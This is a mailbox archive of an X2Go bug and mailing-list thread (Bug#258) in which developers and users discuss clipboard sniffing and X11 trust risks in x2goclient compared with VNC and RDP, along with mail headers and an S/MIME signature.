avoid certain attacks of the "I'll attach > to the root window and get all key events" kind since windowed x2go > sessions give you a separate root window. But I imagine there are more > problems out there nobody thought of yet. Who would know for sure what is expected to be possible and what not? I mean don't take this rude... but for me this basically makes NX unusable, since I basically only use it to connect to more or less untrusted nodes. If that means these can take over my X, or even more... than good night :-/ Cheers, Chris. --=-UBc+OwvjF5O1EeNaUDsf Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Disposition: attachment; filename="smime.p7s" Content-Transfer-Encoding: base64 MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIQ/jCCBXUw ggNdoAMCAQICAwEBgjANBgkqhkiG9w0BAQUFADBUMRQwEgYDVQQKEwtDQWNlcnQgSW5jLjEeMBwG A1UECxMVaHR0cDovL3d3dy5DQWNlcnQub3JnMRwwGgYDVQQDExNDQWNlcnQgQ2xhc3MgMyBSb290 MB4XDTEyMDcyMzE0NTY0NVoXDTE0MDcyMzE0NTY0NVowfDEhMB8GA1UEAxMYQ2hyaXN0b3BoIEFu dG9uIE1pdHRlcmVyMSQwIgYJKoZIhvcNAQkBFhVjYWxlc3R5b0BzY2llbnRpYS5uZXQxMTAvBgkq hkiG9w0BCQEWIm1haWxAY2hyaXN0b3BoLmFudG9uLm1pdHRlcmVyLm5hbWUwggEiMA0GCSqGSIb3 DQEBAQUAA4IBDwAwggEKAoIBAQCq/4X3Urm/IHCIYUyqPrBN6FZ2pmd8V5epPyDlveqtdYvLBLNy gP3G3KhGoCA4Jf49KYGmbqk+F7fVWcG1zcdwEx7itKJyj39nYf2HWXogxUSfKFptbOgpsTcEWuxg ka2EkJuErTvYbwCEKT7mn4v6ScuFBc3Q+Hswlt1jbqjczi+OxcU1skvxM5jGjzRwYPUsiHZJRkWp ogbbhNWZNbwXiMPln380TAlryRAr5UE0dSe1dg1qHhF6HSNKwaer0+Dcd/goL4XQhHxCAGZKfCK0 wVRf1SeEsS9FDGMMjW2b6HpHF+OVXuagjrxSWHttx0+Ez/PZDXpeZpjXatzzmlJFAgMBAAGjggEm MIIBIjAMBgNVHRMBAf8EAjAAMFYGCWCGSAGG+EIBDQRJFkdUbyBnZXQgeW91ciBvd24gY2VydGlm aWNhdGUgZm9yIEZSRUUgaGVhZCBvdmVyIHRvIGh0dHA6Ly93d3cuQ0FjZXJ0Lm9yZzBABgNVHSUE OTA3BggrBgEFBQcDBAYIKwYBBQUHAwIGCisGAQQBgjcKAwQGCisGAQQBgjcKAwMGCWCGSAGG+EIE ATAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAGGFmh0dHA6Ly9vY3NwLmNhY2VydC5vcmcwRAYD VR0RBD0wO4EVY2FsZXN0eW9Ac2NpZW50aWEubmV0gSJtYWlsQGNocmlzdG9waC5hbnRvbi5taXR0 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 --=-UBc+OwvjF5O1EeNaUDsf-- From nable.maininbox@googlemail.com Tue Jul 2 09:10:18 2013 Received: (at 258) by bugs.x2go.org; 2 Jul 2013 07:10:19 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=0.0 required=5.0 tests=FREEMAIL_FROM, RCVD_IN_DNSWL_BLOCKED,T_DKIM_INVALID,URIBL_BLOCKED autolearn=ham version=3.3.2 Received: from mail-bk0-f44.google.com (mail-bk0-f44.google.com [209.85.214.44]) by ymir (Postfix) with ESMTPS id 8AFDA5DA79 for <258@bugs.x2go.org>; Tue, 2 Jul 2013 09:10:18 +0200 (CEST) Received: by mail-bk0-f44.google.com with SMTP id 6so486465bkj.3 for <258@bugs.x2go.org>; Tue, 02 Jul 2013 00:10:18 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; bh=/Ni05ZKP8Md5g2pjZmsXttbJEM7gF4bY8KxzxlrSoEw=; b=YTyCojcj/qdZ5kJ2faeVaoBRIyWwamYTFMDf9xiDmA7MNO6CXSe1LvMHrXE5wNOnNp XYYvnZuCb56BEhE0fYUqUWcWJOGO9Hb0LGq/fzHnN6sCPRK9kvTFwO2zYMzTVpg/d2E/ mArvLpcNR0tLcnz10QBd8RLxACRAfKt9LHM0979KwgqY++Cv9IhoZ8U50GwUYBfl5J9K 4s0cKeeSrHj61I9ivyvnsB3lOZZ39tBKFWQnsb2lTkISB8mfDnws2YKd3tfiD1ImTQcc p8Dg3i5kAYczAOzO+P5w4iwUbRf/8D1Qd2YSHI1t3x2R+NoYLOtLXW1h1QW5vmUx5Kq5 5vHQ== MIME-Version: 1.0 X-Received: by 10.205.4.132 with SMTP id oc4mr3682910bkb.171.1372749018231; Tue, 02 Jul 2013 00:10:18 -0700 (PDT) Received: by 10.204.235.194 with HTTP; Tue, 2 Jul 2013 00:10:18 -0700 (PDT) In-Reply-To: <1372728469.11367.26.camel@fermat.scientia.net> References: <1372646308.18508.2.camel@heisenberg.scientia.net> <20130701114356.GP2447@cip.informatik.uni-erlangen.de> <1372682609.25918.14.camel@heisenberg.scientia.net> <20130701140132.GQ2447@cip.informatik.uni-erlangen.de> <1372728469.11367.26.camel@fermat.scientia.net> Date: Tue, 2 Jul 2013 11:10:18 +0400 Message-ID: Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing From: Nable 80 To: Christoph Anton Mitterer , 258@bugs.x2go.org, x2go-dev@lists.berlios.de Content-Type: text/plain; charset=ISO-8859-1 Hi, Chris. > So it directly goes into the local X server? > Wow... that's awful... like a security nightmare... Then, you don't use ssh -X/-Y, do you? > And people don't see x2go (or VNC, or rdp) like a direct access > to their X server (as in plain X forwarding with xauth and that like). Why do you think so? Because they have it in window and didn't specify any option that exactly means 'turn on X11 forwarding'? After all, I think that it's not a grave issue as most people use X11 forwarding for rather trusted hosts (or just don't care). One additional note: it's possible to turn on clipboard forwarding in RDP and VNC (and it's a very useful thing) but AFAIR in most clients _one have to specify it implicitly_ (and sometimes there's a separate option that allows some restricted clipboard access, for example: copying from remote to local but not vise versa). May be someone will make a patch to implement such options in X2Go. From nable.maininbox@googlemail.com Tue Jul 2 10:01:34 2013 Received: (at 258) by bugs.x2go.org; 2 Jul 2013 08:01:35 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=0.0 required=5.0 tests=FREEMAIL_FROM, RCVD_IN_DNSWL_BLOCKED,T_DKIM_INVALID,URIBL_BLOCKED autolearn=ham version=3.3.2 Received: from mail-bk0-f49.google.com (mail-bk0-f49.google.com [209.85.214.49]) by ymir (Postfix) with ESMTPS id C2BD95DA79 for <258@bugs.x2go.org>; Tue, 2 Jul 2013 10:01:34 +0200 (CEST) Received: by mail-bk0-f49.google.com with SMTP id mz10so2104416bkb.8 for <258@bugs.x2go.org>; Tue, 02 Jul 2013 01:01:34 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; bh=x1lU4PCUzL7sk58vQbp3HtoUdCXWj2uvN5mrDMowh/U=; b=iNK4WCUxrMbZghyg7pFIZ3Ly9mYf93o1c6tVUnhriL+h1B/DacBHAPfy5d2sFowNrB BUVwjT69pqMiqbbmiLFiQCnnFIYcvrPaZycrs40YsIFnkLX+xHttMlXwRZkzaP8sYN1t hCazZY5EvKGl/Z2igShTP3sp0xFQqN1qyNDyoShAG6Zf4n/XkMwD0HW6MUonHPBpjryS VV7RqScRZGPfyUhSwCdI7M656WuFcBJaG1t2ktlSemydQhM7KYeipA+TOtKowBi2csE6 CBNNEWM5G4gclATKd5oYxW3VP/7GxjQ/AGDFlZpQSDVhYhtbJW37lFAg6lrz1xobNBgy TEVw== MIME-Version: 1.0 X-Received: by 10.204.227.81 with SMTP id iz17mr3550115bkb.157.1372752094358; Tue, 02 Jul 2013 01:01:34 -0700 (PDT) Received: by 10.204.235.194 with HTTP; Tue, 2 Jul 2013 01:01:34 -0700 (PDT) In-Reply-To: References: <1372646308.18508.2.camel@heisenberg.scientia.net> <20130701114356.GP2447@cip.informatik.uni-erlangen.de> <1372682609.25918.14.camel@heisenberg.scientia.net> <20130701140132.GQ2447@cip.informatik.uni-erlangen.de> <1372728469.11367.26.camel@fermat.scientia.net> Date: Tue, 2 Jul 2013 12:01:34 +0400 Message-ID: Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing From: Nable 80 To: Christoph Anton Mitterer , 258@bugs.x2go.org, x2go-dev@lists.berlios.de Content-Type: text/plain; charset=ISO-8859-1 Sorry, quickfix: s/implicitly/explicitely/ 2013/7/2, Nable 80 : > Hi, Chris. > >> So it directly goes into the local X server? >> Wow... that's awful... like a security nightmare... > Then, you don't use ssh -X/-Y, do you? > >> And people don't see x2go (or VNC, or rdp) like a direct access >> to their X server (as in plain X forwarding with xauth and that like). > Why do you think so? Because they have it in window and didn't specify > any option that exactly means 'turn on X11 forwarding'? > After all, I think that it's not a grave issue as most people use X11 > forwarding for rather trusted hosts (or just don't care). > > One additional note: it's possible to turn on clipboard forwarding in > RDP and VNC (and it's a very useful thing) but AFAIR in most clients > _one have to specify it implicitly_ (and sometimes there's a separate > option that allows some restricted clipboard access, for example: > copying from remote to local but not vise versa). May be someone will > make a patch to implement such options in X2Go. > _______________________________________________ > X2Go-Dev mailing list > X2Go-Dev@lists.berlios.de > https://lists.berlios.de/mailman/listinfo/x2go-dev > From arw@cip.cs.fau.de Tue Jul 2 18:14:57 2013 Received: (at 258) by bugs.x2go.org; 2 Jul 2013 16:14:58 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=0.0 required=5.0 tests=RCVD_IN_DNSWL_BLOCKED, URIBL_BLOCKED autolearn=ham version=3.3.2 X-Greylist: delayed 424 seconds by postgrey-1.34 at ymir; Tue, 02 Jul 2013 18:14:57 CEST Received: from faui03.informatik.uni-erlangen.de (faui03.informatik.uni-erlangen.de [131.188.30.103]) by ymir (Postfix) with ESMTPS id 9E81E5DB13 for <258@bugs.x2go.org>; Tue, 2 Jul 2013 18:14:57 +0200 (CEST) Received: from warp (vpn-000-018.vpn.informatik.uni-erlangen.de [10.222.0.18]) (using TLSv1.2 with cipher DHE-RSA-AES128-SHA (128/128 bits)) (No client certificate requested) by faui03.informatik.uni-erlangen.de (Postfix) with ESMTPS id 196F1680908; Tue, 2 Jul 2013 18:07:53 +0200 (CEST) Date: Tue, 2 Jul 2013 18:07:52 +0200 From: Alexander Wuerstlein To: x2go-dev@lists.berlios.de Cc: Christoph Anton Mitterer , 258@bugs.x2go.org Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing Message-ID: <20130702180752.6b3c8c97@warp> In-Reply-To: <1372728469.11367.26.camel@fermat.scientia.net> References: <1372646308.18508.2.camel@heisenberg.scientia.net> <20130701114356.GP2447@cip.informatik.uni-erlangen.de> <1372682609.25918.14.camel@heisenberg.scientia.net> <20130701140132.GQ2447@cip.informatik.uni-erlangen.de> <1372728469.11367.26.camel@fermat.scientia.net> X-Mailer: Claws Mail 3.9.2 (GTK+ 2.24.18; x86_64-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit On Tue, 02 Jul 2013 03:27:49 +0200 Christoph Anton Mitterer wrote: > Hey Alexander. > > First,... I assume you're one of the NX/X2go developers? I've submitted some patches, yes. But I don't commit things as often as I would want to. > On Mon, 2013-07-01 at 16:01 +0200, Alexander Wuerstlein wrote: > > It isn't like that at all, X11 clients and servers have to comply > > with the respective parts of the protocol. If the protocol demands > > insecure behaviour, its a design bug, or maybe, like in this case, > > a compromise nobody likes: Since in X11 clients handle all the > > shortcuts and mouse button events, since clients or toolkits handle > > the widgets, the only option to implement C&P is to have clients > > ask the server for the clipboard or selection contents. Its more a > > "there is no other way to do it except to make it unusable" kind of > > problem imho. > Well first I may have a misunderstanding about how NX works, but more > on that below: > > And people don't see x2go (or VNC, or rdp) like a direct access to > their X server (as in plain X forwarding with xauth and that like). > This might be a misunderstanding... but it's how many similar such > "VNC-like" connections (i.e. a screen output into _one single_ X > window) work. > E.g. when I connect to my qemu virtual machines, I don't have to > worry, that the VM can overtake my X server,... the same for > Virtualbox... and I hope/believe for VNC/TightVNC/etc. and rdp > connections (rdesktop and friends). Well, in that aspect, VNC, RDP and x2go/NX are somewhat different. VNC and RDP basically started from some dumb kind of framebuffer and keyboard/mouse event forwarding. X11 has a far larger amount of functionality and a huge system of extensions on top. x2go/NX starts out from X11 and changes some aspects, pruning things that are slow or unnecessary (e.g. synchronous calls or uncompressed bitmaps). So while with VNC/RDP you have a very simple starting point from which you then can add some extensions like clipboards, with X11/x2go/NX you have everything and need to throw away stuff that might be bad. People are still in the process of figuring out the bad stuff, and generally its the far more hazardous direction of development. > This includes that users don't expect (or at least they shouldn't have > to) that such connections allow wiretapping, e.g. if such a system > supports audio forwarding... it shouldn't allow the remote side to > activate my MIC and listen to what I say/sing/etc. Well, if you switch on audio forwarding in RDP, the other side can do exactly that... > The same holds true for the clipboard... at least per default it > shouldn't be ever sent to the remote side (or vice versa)... and IF > one activates it... people should be warned with big warnings what > this could mean. I agree that this would be desirable. > That this can indeed lead to compromise showed a recent attack we've > had on one our institutes' machines, where sensitive information was > caught via an X2go connection and later on used for other attacks. Do you have any more in-depth writeup of that attack so we maybe can learn from it and look at certain things more specifically? > Now for the technical side... admittedly I don't know the details of > how NX interacts with X... but there must be some way to achieve > blocking of the clipboard sync. > Even if the protocol demands to send some content,... well then simply > hook in an clear it always (per default). Yes, that should be possible. Its just that someone has to implement it. > Now more off topic about how NX interacts with X: > > [...] > Now with NX I understand it's compression at the X protocol level, so > "no JPEGs being transferred"... but where do remotes X protocol go to? > Directly into the local X? Or is it taken by NX/X2go and rendered as > if NX/X2go would be an X server that is displayed in a _single_ > window of another one (i.e. like Xephyr)? Some protocol calls are taken as is and passed to the local X, others are "transformed", e.g. made asynchronous, bitmap-compressed, etc. > > And if you > > wouldn't trust a host with 'ssh -X', then you also shouldn't trust > > it with x2go. > Well this is _really_ serious news... > So why? I mean that's what most people expect I guess.. like when you > connect via ssh, that the remote cannot take over your local system... > (unless some serious hole would be find in the ssh client ;) ) Well, the remote can't take over your system afaik. But there are concerns about the security of ssh -X vs. -Y. Keystroke monitoring is one of those concerns. > > Just think of x2go as a variant of 'ssh -X' with image > > compression and some extras. X11 protocol firewalling is not really > > one of those extras. And since the x2goclient will always run in > > your local X session, it will always be able to read your clipboard. > So it directly goes into the local X server? Wow... that's awful... > like a security nightmare... Yes, it can be. > > In a way, yes. Afaik you can avoid certain attacks of the "I'll > > attach to the root window and get all key events" kind since > > windowed x2go sessions give you a separate root window. But I > > imagine there are more problems out there nobody thought of yet. > Who would know for sure what is expected to be possible and what not? > > I mean don't take this rude... but for me this basically makes NX > unusable, since I basically only use it to connect to more or less > untrusted nodes. > If that means these can take over my X, or even more... than good > night :-/ Yes, connections to untrusted hosts are problematic. For this I consider VNC to be more suited. Ciao, Alexander Wuerstlein. From calestyo@scientia.net Tue Jul 2 19:47:35 2013 Received: (at 258) by bugs.x2go.org; 2 Jul 2013 17:47:35 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-0.7 required=5.0 tests=RCVD_IN_DNSWL_LOW autolearn=ham version=3.3.2 Received: from mailgw01.dd24.net (mailgw01.dd24.net [193.46.215.41]) by ymir (Postfix) with ESMTPS id 0C9F55DB13 for <258@bugs.x2go.org>; Tue, 2 Jul 2013 19:47:35 +0200 (CEST) Received: from localhost (amavis01.dd24.net [192.168.1.111]) by mailgw01.dd24.net (Postfix) with ESMTP id CFBD17CC1DA; Tue, 2 Jul 2013 17:47:34 +0000 (GMT) X-Virus-Scanned: domaindiscount24.com mail filter gateway Received: from mailgw01.dd24.net ([192.168.1.191]) by localhost (amavis01.dd24.net [192.168.1.105]) (amavisd-new, port 10191) with ESMTP id EEZUKWs1mR3y; Tue, 2 Jul 2013 17:47:28 +0000 (GMT) Received: from [10.153.238.27] (unknown [141.84.43.125]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by mailgw01.dd24.net (Postfix) with ESMTPSA id 5936B7CC1C5; Tue, 2 Jul 2013 17:47:28 +0000 (GMT) Message-ID: <1372787237.7849.101.camel@heisenberg.scientia.net> Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing From: Christoph Anton Mitterer To: 258@bugs.x2go.org Cc: x2go-dev@lists.berlios.de Date: Tue, 02 Jul 2013 19:47:17 +0200 In-Reply-To: <20130702180752.6b3c8c97@warp> References: <1372646308.18508.2.camel@heisenberg.scientia.net> <20130701114356.GP2447@cip.informatik.uni-erlangen.de> <1372682609.25918.14.camel@heisenberg.scientia.net> <20130701140132.GQ2447@cip.informatik.uni-erlangen.de> <1372728469.11367.26.camel@fermat.scientia.net> <20130702180752.6b3c8c97@warp> Content-Type: multipart/signed; micalg="sha512"; protocol="application/x-pkcs7-signature"; boundary="=-biy9qWMbz3n7guFJvWCa" X-Mailer: Evolution 3.4.4-3 Mime-Version: 1.0 --=-biy9qWMbz3n7guFJvWCa Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: quoted-printable On Tue, 2013-07-02 at 18:07 +0200, Alexander Wuerstlein wrote:=20 > Well, in that aspect, VNC, RDP and x2go/NX are somewhat different. VNC an= d RDP > basically started from some dumb kind of framebuffer and keyboard/mouse e= vent > forwarding. I knew (at least the VNC / RDP part)... and I started to realise the difference from NX ;) > X11 has a far larger amount of functionality and a huge system of > extensions on top. Sure... > x2go/NX starts out from X11 and changes some aspects, > pruning things that are slow or unnecessary (e.g. synchronous calls or > uncompressed bitmaps). So while with VNC/RDP you have a very simple start= ing > point from which you then can add some extensions like clipboards, with > X11/x2go/NX you have everything and need to throw away stuff that might b= e bad. > People are still in the process of figuring out the bad stuff, and genera= lly its > the far more hazardous direction of development. That's the problem... at least security wise... I mean it's no wonder that no sane person uses ssh -X on other hosts (especially untrusted ones)... the X protocol is so complex especially with all extensions.. and the typical attacks like global event grabbing or a "screen man in the middle attack" where a new full screen window tricks you into something evil... are probably just the simplest ideas of attacking. > > This includes that users don't expect (or at least they shouldn't have > > to) that such connections allow wiretapping, e.g. if such a system > > supports audio forwarding... it shouldn't allow the remote side to > > activate my MIC and listen to what I say/sing/etc. > Well, if you switch on audio forwarding in RDP, the other side can do exa= ctly > that... 